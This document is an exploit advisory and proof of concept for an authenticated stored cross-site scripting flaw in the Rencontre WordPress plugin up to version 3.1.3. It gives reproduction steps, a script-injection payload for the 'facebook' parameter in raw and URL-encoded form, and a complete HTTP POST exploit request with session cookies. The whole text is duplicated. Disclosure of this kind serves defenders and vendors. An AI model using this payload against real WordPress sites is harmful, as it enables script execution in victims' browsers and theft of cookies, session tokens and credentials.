sathishshan/#0 Auth_Stored_XSS.txt

## #0 Auth_Stored_XSS.txt
# Exploit Title: Rencontre Wordpress plugin - Authenticated Stored XSS
# Date: 03/08/2019
# Exploit Author: Sathishshan
# Version: <= 3.1.3
# Vendor Homepage: Recontre
# Software Link: https://wordpress.org/plugins/rencontre/
# Tested on: Ubuntu-server 18.0.* OS
# Category : Webapps

# Description

A authenticated persistent cross-site scripting vulnerability has been found in the web interface of the plugin that allows the execution of arbitrary HTML/script code to be executed in the victim's browser when they visit the web site.

# Reproduction Steps:

1. Login in WordPress and go to Plugin page
2. Under the "Framework for the Facebook Like button" there is a text area
3. Enter/paste the payload & save

# POC:
Prameter: facebook
Payload: </textarea></td><script>alert('XSS')</script>//
Encoded-Payload: %3C%2Ftextarea%3E%3C%2Ftd%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%2F%2F

# Exploit Request:

POST /wp-admin/admin.php?page=rencontre.php HTTP/1.1
Host: 192.168.144.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.144.128/wp-admin/admin.php?page=rencontre.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 231
Connection: close
Cookie: wordpress_bcee6f2sd387088d5ea973ea693516cd69e=admin%7C1564998379d%7CWy0iShin5dUwq9YOnrQqBUZ4Ul3XESucFBByPmUEdIF%7C05e93f0c17987198aaebc4dfbf797d1f74eeda8f08f61fd82026e207c6325b7ccf; PHPSESSID=nce78i7qvm2g4d63sddgar2n68rc; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bcee6f2387088d5e973ea693516cd69e=admin%7C1564998379%7CWy0iShin5dUwq9YOnrQqBUZ4Ul3XESucFBByPmUEdIF%7C84170a324458679871685b28dcb147a2e88fdsaae850eb6c5d8bb2ecc1636a894005; wp-settings-1=editor%3Dtinymce%26hidetb%3D0%26mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1564825233
Upgrade-Insecure-Requests: 1

home=http%3A%2F%2F192.168.144.128%2Findex.php%2Fsample-page%2F&pays=AL&prison=8&avatar=1&msgdel=4&dead=1&hcron=1&facebook=%3C%2Ftextarea%3E%3C%2Ftd%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%2F%2F%3C%2Ftextarea%3E%3C%2Ftd%3E

# Impact:

An attacker can execute malicious code in a victim's browser to perform various activities such as stealing cookies, session tokens, credentials and personal data amongst others.

# Remediation:

Uninstall the plugin until the vulnerability has been fixed by the developer.
	# Exploit Title: Rencontre Wordpress plugin - Authenticated Stored XSS
	# Date: 03/08/2019
	# Exploit Author: Sathishshan
	# Version: <= 3.1.3
	# Vendor Homepage: Recontre
	# Software Link: https://wordpress.org/plugins/rencontre/
	# Tested on: Ubuntu-server 18.0.* OS
	# Category : Webapps

	# Description

	A authenticated persistent cross-site scripting vulnerability has been found in the web interface of the plugin that allows the execution of arbitrary HTML/script code to be executed in the victim's browser when they visit the web site.

	# Reproduction Steps:

	1. Login in WordPress and go to Plugin page
	2. Under the "Framework for the Facebook Like button" there is a text area
	3. Enter/paste the payload & save

	# POC:
	Prameter: facebook
	Payload: </textarea></td><script>alert('XSS')</script>//
	Encoded-Payload: %3C%2Ftextarea%3E%3C%2Ftd%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%2F%2F

	# Exploit Request:

	POST /wp-admin/admin.php?page=rencontre.php HTTP/1.1
	Host: 192.168.144.128
	User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	Referer: http://192.168.144.128/wp-admin/admin.php?page=rencontre.php
	Content-Type: application/x-www-form-urlencoded
	Content-Length: 231
	Connection: close
	Cookie: wordpress_bcee6f2sd387088d5ea973ea693516cd69e=admin%7C1564998379d%7CWy0iShin5dUwq9YOnrQqBUZ4Ul3XESucFBByPmUEdIF%7C05e93f0c17987198aaebc4dfbf797d1f74eeda8f08f61fd82026e207c6325b7ccf; PHPSESSID=nce78i7qvm2g4d63sddgar2n68rc; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bcee6f2387088d5e973ea693516cd69e=admin%7C1564998379%7CWy0iShin5dUwq9YOnrQqBUZ4Ul3XESucFBByPmUEdIF%7C84170a324458679871685b28dcb147a2e88fdsaae850eb6c5d8bb2ecc1636a894005; wp-settings-1=editor%3Dtinymce%26hidetb%3D0%26mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1564825233
	Upgrade-Insecure-Requests: 1

	home=http%3A%2F%2F192.168.144.128%2Findex.php%2Fsample-page%2F&pays=AL&prison=8&avatar=1&msgdel=4&dead=1&hcron=1&facebook=%3C%2Ftextarea%3E%3C%2Ftd%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%2F%2F%3C%2Ftextarea%3E%3C%2Ftd%3E

	# Impact:

	An attacker can execute malicious code in a victim's browser to perform various activities such as stealing cookies, session tokens, credentials and personal data amongst others.

	# Remediation:

	Uninstall the plugin until the vulnerability has been fixed by the developer.